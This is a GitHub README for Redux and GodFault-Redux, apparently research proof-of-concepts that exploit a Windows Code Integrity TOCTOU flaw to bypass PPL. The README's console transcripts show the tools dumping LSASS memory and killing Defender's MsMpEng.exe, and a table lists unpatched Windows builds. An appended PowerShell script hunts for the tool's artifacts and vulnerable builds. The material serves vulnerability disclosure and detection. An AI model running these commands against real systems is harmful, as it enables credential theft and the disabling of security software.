gabriellandau/Redux

GitHub: gabriellandau/Redux

Exploit tool that abuses a Windows Code Integrity TOCTOU vulnerability to bypass PPL protection and dump protected processes.

Stars: 11 | Forks: 1

# Redux

Redux is released by [Gabriel Landau](https://twitter.com/GabrielLandau) of [Elastic Security](https://www.elastic.co/security-labs/). It is a variant of the now-patched [PPLFault](https://github.com/gabriellandau/PPLFault) exploit that bypasses Microsoft's [mitigation](https://www.elastic.co/security-labs/inside-microsofts-plan-to-kill-pplfault) for PPLFault.

## Redux

Redux exploits a TOCTOU vulnerability in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light, then dumps the specified process. For more details on the exploit, see our research:

- [The Immutable Illusion: Pwning Your Kernel with Cloud Files](https://www.elastic.co/security-labs/immutable-illusion)

### Demo

https://github.com/user-attachments/assets/b6d7bc20-18dc-4a77-a39e-c92f0c1a1fe1

### Example output

```
PS C:\Users\user\Desktop> cmd /c ver

Microsoft Windows [Version 10.0.20348.4773]
PS C:\Users\user\Desktop> $TargetPid = (Get-Process lsass).Id
PS C:\Users\user\Desktop> (Get-NtProcess -Access QueryLimitedInformation -Pid $TargetPid).Protection

Type           Signer
----           ------
ProtectedLight Lsa

PS C:\Users\user\Desktop> dir *.dmp
PS C:\Users\user\Desktop> .\Redux.exe -v $TargetPid lsass.dmp
[+] No cleanup necessary. Backup does not exist.
[+] GetShellcode: 528 bytes of shellcode written over DLL entrypoint
[+] Benign: C:\Windows\System32\EventAggregation.dll.bak
[+] Payload: C:\PPLFaultTemp\PPLFaultPayload.dll
[+] Placeholder: C:\PPLFaultTemp\EventAggregationPH.dll
[+] Acquired exclusive oplock to file: C:\Windows\System32\devobj.dll
[+] Ready. Spawning WinTcb.
[+] SpawnPPL: Waiting for child process to finish.
[+] FetchDataCallback called.
[+] Hydrating 90112 bytes at offset 0
[+] Switching to payload
[+] Give the memory manager a moment to think
[+] Emptying system working set
[+] Working set purged
[+] FetchDataCallback called.
[+] Hydrating 90112 bytes at offset 0
[+] Successfully hydrated file: C:\PPLFaultTemp\EventAggregationPH.dll
[+] Dump saved to: lsass.dmp
[+] Dump is 49.1 MB
[+] Operation took 2109 ms
PS C:\Users\user\Desktop> dir *.dmp

    Directory: C:\Users\user\Desktop

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----          2/11/2026  4:17 PM       51500633 lsass.dmp
```

## GodFault-Redux

GodFault-Redux exploits the same TOCTOU vulnerability as Redux. However, instead of dumping a process, it migrates into CSRSS and uses the vulnerability in `win32k!NtUserHardErrorControlCall` from [ANGRYORCHARD](https://github.com/gabriellandau/ANGRYORCHARD/blob/0a4720f7e07e86a9ac2783411b81efac14938e26/Exploit.c#L69-L81) to decrement `KTHREAD.PreviousMode` from `UserMode` (1) to `KernelMode` (0). It demonstrates that it has obtained "God Mode" privileges by terminating a process that normally cannot be terminated, such as `MsMpEng.exe`.

### Example output

```
PS C:\Users\user\Desktop> (Get-Process MsMpEng).Id
844
PS C:\Users\user\Desktop> taskkill /f /pid 844
ERROR: The process with PID 844 could not be terminated.
Reason: Access is denied.
PS C:\Users\user\Desktop> .\GodFault-Redux.exe -k MsMpEng.exe
[+] Thread 5668 (KTHREAD FFFFB9043ACB2080) has been blessed by GodFault
[+] Initial blessing successful
[+] Testing post-exploit ability to acquire PROCESS_ALL_ACCESS to System: Success
[+] Opened \Device\PhysicalMemory. Handle is 0x14c
[+] Opened System process as PROCESS_ALL_ACCESS. Handle is 0x148
[+] GodFault killed process 844: MsMpEng.exe
PS C:\Users\user\Desktop> (Get-Process MsMpEng).Id
Get-Process : Cannot find a process with the name "MsMpEng". Verify the process name and call the cmdlet again.
At line:1 char:2
+ (Get-Process MsMpEng).Id
+  ~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (MsMpEng:String) [Get-Process], ProcessCommandException
    + FullyQualifiedErrorId : NoProcessFoundForGivenName,Microsoft.PowerShell.Commands.GetProcessCommand
```

## Affected platforms as of February 2026

| Operating system | Lifecycle | Fix status |
| :---- | :---- | :---- |
| Windows 11 24H2 | [Mainstream support](https://learn.microsoft.com/en-us/lifecycle/products/windows-11-home-and-pro) | ✔ Fixed |
| Windows 10 Enterprise LTSC 2021 | [Mainstream support](https://learn.microsoft.com/en-us/lifecycle/products/windows-10-enterprise-ltsc-2021) | ❌ Still exploitable as of February 2026 (19044.6937) |
| Windows Server 2025 | [Mainstream support](https://learn.microsoft.com/en-us/lifecycle/products/windows-server-2025) | ✔ Fixed |
| Windows Server 2022 | [Mainstream support](https://learn.microsoft.com/en-us/lifecycle/products/windows-server-2022) | ❌ Still exploitable as of February 2026 (20348.4773) |
| Windows Server 2019 | [Extended support](https://learn.microsoft.com/en-us/lifecycle/products/windows-server-2019) | ❌ Still exploitable as of February 2026 (17763.8389) |

# License

Redux is licensed under [ELv2](LICENSE.txt). It uses [phnt](https://github.com/winsiderss/systeminformer/tree/25846070780183848dc8d8f335a54fa6e636e281/phnt) from SystemInformer, which is [MIT licensed](phnt/LICENSE.txt).

# Credits

Redux builds on our prior work [PPLFault](https://github.com/gabriellandau/PPLFault), which was inspired by [PPLdump](https://github.com/itm4n/PPLdump) by [Clément Labro](https://infosec.exchange/@itm4n). [ANGRYORCHARD](https://github.com/gabriellandau/ANGRYORCHARD) was created by [Austin Hudson](https://twitter.com/ilove2pwn_), who released it when Microsoft patched PPLdump.
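A defender-side hunt, added here as an example and not part of the Redux repository: it looks for the on-disk artifacts that appear in the Redux sample output above and compares the host's build against the affected-platform table. The artifact paths and build numbers come from this page; treating the listed builds as a "last observed exploitable" threshold rather than an exact patch boundary is an assumption, as is the staging-directory check.

```powershell
# Added example, not part of Redux. Hunts for the on-disk artifacts named in the
# Redux sample output and reports whether this host's build is at or below one
# the README table lists as still exploitable (assumed threshold, not a patch boundary).

$ArtifactPaths = @(
    'C:\Windows\System32\EventAggregation.dll.bak',   # "[+] Benign:" backup of the real DLL
    'C:\PPLFaultTemp\PPLFaultPayload.dll',            # "[+] Payload:"
    'C:\PPLFaultTemp\EventAggregationPH.dll'          # "[+] Placeholder:" (Cloud Files placeholder)
)

# CurrentBuildNumber -> UBR pairs from the "Affected platforms" table.
$ExploitableBuilds = @{
    '19044' = 6937   # Windows 10 Enterprise LTSC 2021
    '20348' = 4773   # Windows Server 2022
    '17763' = 8389   # Windows Server 2019
}

function Get-ReduxArtifacts {
    # Assumption: the staging directory itself is suspicious even when emptied.
    $Candidates = @('C:\PPLFaultTemp') + $ArtifactPaths
    foreach ($Path in $Candidates) {
        if (-not (Test-Path -LiteralPath $Path)) { continue }
        $Item = Get-Item -LiteralPath $Path -Force
        # Cloud Files placeholders are backed by a reparse point; a reparse-pointed
        # DLL in a staging directory is worth escalating on its own.
        [pscustomobject]@{
            Path         = $Path
            ReparsePoint = (($Item.Attributes -band [IO.FileAttributes]::ReparsePoint) -ne 0)
            LastWrite    = $Item.LastWriteTime
        }
    }
}

function Test-ReduxExposedBuild {
    $Cv    = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion'
    $Build = [string]$Cv.CurrentBuildNumber
    $Ubr   = [int]$Cv.UBR
    if ($ExploitableBuilds.ContainsKey($Build) -and $Ubr -le $ExploitableBuilds[$Build]) {
        return "Build $Build.$Ubr is at or below a build the README lists as still exploitable"
    }
    return "Build $Build.$Ubr is not in the README's exploitable list; confirm against current patch state"
}

Get-ReduxArtifacts | Format-Table -AutoSize
Test-ReduxExposedBuild
```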